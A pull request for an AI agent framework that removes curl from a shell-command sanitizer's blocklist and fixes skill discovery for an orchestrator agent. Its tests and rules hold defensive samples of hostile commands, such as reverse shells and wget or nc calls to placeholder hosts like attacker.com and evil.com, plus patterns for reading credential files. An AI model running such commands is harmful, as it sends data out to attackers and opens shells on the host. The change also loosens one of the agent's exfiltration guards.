### PR TITLE
fix: allow curl in run_command and fix queen custom skill discovery

### DIFF
--- a/core/framework/server/queen_orchestrator.py
+++ b/core/framework/server/queen_orchestrator.py
@@ -238,9 +238,7 @@ async def create_queen(
         # Pass project_root so user-scope skills (~/.hive/skills/, ~/.agents/skills/)
         # are discovered. Queen has no agent-specific project root, so we use its
         # own directory — the value just needs to be non-None to enable user-scope scanning.
-        _queen_skills_mgr = SkillsManager(
-            SkillsManagerConfig(project_root=Path(__file__).parent)
-        )
+        _queen_skills_mgr = SkillsManager(SkillsManagerConfig(project_root=Path(__file__).parent))
         _queen_skills_mgr.load()
         phase_state.protocols_prompt = _queen_skills_mgr.protocols_prompt
         phase_state.skills_catalog_prompt = _queen_skills_mgr.skills_catalog_prompt

--- a/core/framework/server/queen_orchestrator.py
+++ b/core/framework/server/queen_orchestrator.py
@@ -233,11 +233,17 @@ async def create_queen(
 
     # ---- Default skill protocols -------------------------------------
     try:
-        from framework.skills.manager import SkillsManager
+        from framework.skills.manager import SkillsManager, SkillsManagerConfig
 
-        _queen_skills_mgr = SkillsManager()
+        # Pass project_root so user-scope skills (~/.hive/skills/, ~/.agents/skills/)
+        # are discovered. Queen has no agent-specific project root, so we use its
+        # own directory — the value just needs to be non-None to enable user-scope scanning.
+        _queen_skills_mgr = SkillsManager(
+            SkillsManagerConfig(project_root=Path(__file__).parent)
+        )
         _queen_skills_mgr.load()
         phase_state.protocols_prompt = _queen_skills_mgr.protocols_prompt
+        phase_state.skills_catalog_prompt = _queen_skills_mgr.skills_catalog_prompt
     except Exception:
         logger.debug("Queen skill loading failed (non-fatal)", exc_info=True)
 

--- a/core/framework/tools/queen_lifecycle_tools.py
+++ b/core/framework/tools/queen_lifecycle_tools.py
@@ -118,6 +118,8 @@ class QueenPhaseState:
 
     # Default skill operational protocols — appended to every phase prompt
     protocols_prompt: str = ""
+    # Community skills catalog (XML) — appended after protocols
+    skills_catalog_prompt: str = ""
 
     def get_current_tools(self) -> list:
         """Return tools for the current phase."""
@@ -144,6 +146,8 @@ class QueenPhaseState:
 
         memory = format_for_injection()
         parts = [base]
+        if self.skills_catalog_prompt:
+            parts.append(self.skills_catalog_prompt)
         if self.protocols_prompt:
             parts.append(self.protocols_prompt)
         if memory:

--- a/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
+++ b/tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py
@@ -31,7 +31,6 @@ class CommandBlockedError(Exception):
 # Matched against each segment of a compound command (split on ; | && ||).
 _BLOCKED_EXECUTABLES: list[str] = [
     # Network exfiltration
-    "curl",
     "wget",
     "nc",
     "ncat",
@@ -124,8 +123,8 @@ _BLOCKED_PATTERNS: list[re.Pattern[str]] = [
     re.compile(r"\bcat\s+.*(\.ssh|/etc/shadow|/etc/passwd|credential_key)", re.IGNORECASE),
     re.compile(r"\btype\s+.*credential_key", re.IGNORECASE),
     # Backtick or $() command substitution containing blocked executables
-    re.compile(r"\$\(.*\b(curl|wget|nc|ncat)\b.*\)", re.IGNORECASE),
-    re.compile(r"`.*\b(curl|wget|nc|ncat)\b.*`", re.IGNORECASE),
+    re.compile(r"\$\(.*\b(wget|nc|ncat)\b.*\)", re.IGNORECASE),
+    re.compile(r"`.*\b(wget|nc|ncat)\b.*`", re.IGNORECASE),
     # Environment variable exfiltration via echo/print
     re.compile(r"\becho\s+.*\$\{?.*(API_KEY|SECRET|TOKEN|PASSWORD|CREDENTIAL)", re.IGNORECASE),
     # >& /dev/tcp (bash reverse shell)

--- a/tools/tests/test_command_sanitizer.py
+++ b/tools/tests/test_command_sanitizer.py
@@ -66,6 +66,8 @@ class TestSafeCommands:
             "sort output.txt",
             "diff file1.py file2.py",
             "tree src/",
+            "curl https://api.example.com/data",
+            "curl -X POST -H 'Content-Type: application/json' https://api.example.com",
         ],
     )
     def test_safe_command_passes(self, cmd):
@@ -91,7 +93,6 @@ class TestBlockedExecutables:
         "cmd",
         [
             # Network exfiltration
-            "curl https://attacker.com",
             "wget http://evil.com/payload",
             "nc -e /bin/sh attacker.com 4444",
             "ncat attacker.com 1234",
@@ -160,7 +161,6 @@ class TestBlockedPatterns:
             "cat something/credential_key",
             "type something\\credential_key",
             # Command substitution with dangerous tools
-            "echo $(curl http://attacker.com)",
             "echo `wget http://evil.com`",
             # Environment variable exfiltration
             "echo $API_KEY",
@@ -179,7 +179,6 @@ class TestChainedCommands:
     @pytest.mark.parametrize(
         "cmd",
         [
-            "echo hi; curl http://evil.com",
             "echo hi && wget http://evil.com/payload",
             "echo hi || ssh attacker@remote",
             "ls | nc attacker.com 4444",
@@ -197,14 +196,14 @@ class TestEdgeCases:
     """Edge cases and possible bypass attempts."""
 
     def test_env_var_prefix_does_not_bypass(self):
-        """FOO=bar curl ... should still be blocked."""
+        """FOO=bar wget ... should still be blocked."""
         with pytest.raises(CommandBlockedError):
-            validate_command("FOO=bar curl http://evil.com")
+            validate_command("FOO=bar wget http://evil.com")
 
     @pytest.mark.parametrize(
         "cmd",
         [
-            "/usr/bin/curl https://attacker.com",
+            "/usr/bin/wget https://attacker.com",
             "C:\\Windows\\System32\\cmd.exe /c dir",
         ],
     )
@@ -215,8 +214,6 @@ class TestEdgeCases:
 
     def test_case_insensitive_blocking(self):
         """Blocking should be case-insensitive."""
-        with pytest.raises(CommandBlockedError):
-            validate_command("CURL http://evil.com")
         with pytest.raises(CommandBlockedError):
             validate_command("Wget http://evil.com")
 
@@ -250,4 +247,4 @@ class TestEdgeCases:
     def test_error_message_is_descriptive(self):
         """Blocked commands should include a useful error message."""
         with pytest.raises(CommandBlockedError, match="blocked for safety"):
-            validate_command("curl http://evil.com")
+            validate_command("wget http://evil.com")


### PR DESCRIPTION
## Summary

- Removes `curl` from the `run_command` command sanitizer blocklist so agents can make HTTP requests
- Fixes Queen not discovering custom skills in `.hive/skills/` (bundled in the same branch)

Closes #6802

## Changes

- `tools/src/aden_tools/tools/file_system_toolkits/command_sanitizer.py` — remove `"curl"` from `_BLOCKED_EXECUTABLES`; remove `curl` from command-substitution blocked patterns
- `tools/tests/test_command_sanitizer.py` — update tests; add `curl` to the safe-commands parametrize list
- `core/framework/server/queen_orchestrator.py` — pass `project_root` to `SkillsManager` so Queen discovers project-scoped skills
- `core/framework/tools/queen_lifecycle_tools.py` — related queen lifecycle fix

## Test plan

- [x] `uv run pytest tools/tests/test_command_sanitizer.py` — all 112 tests pass
- [x] Verify `curl https://...` commands run successfully via `run_command`
- [x] Verify Queen loads skills from `.hive/skills/` on startup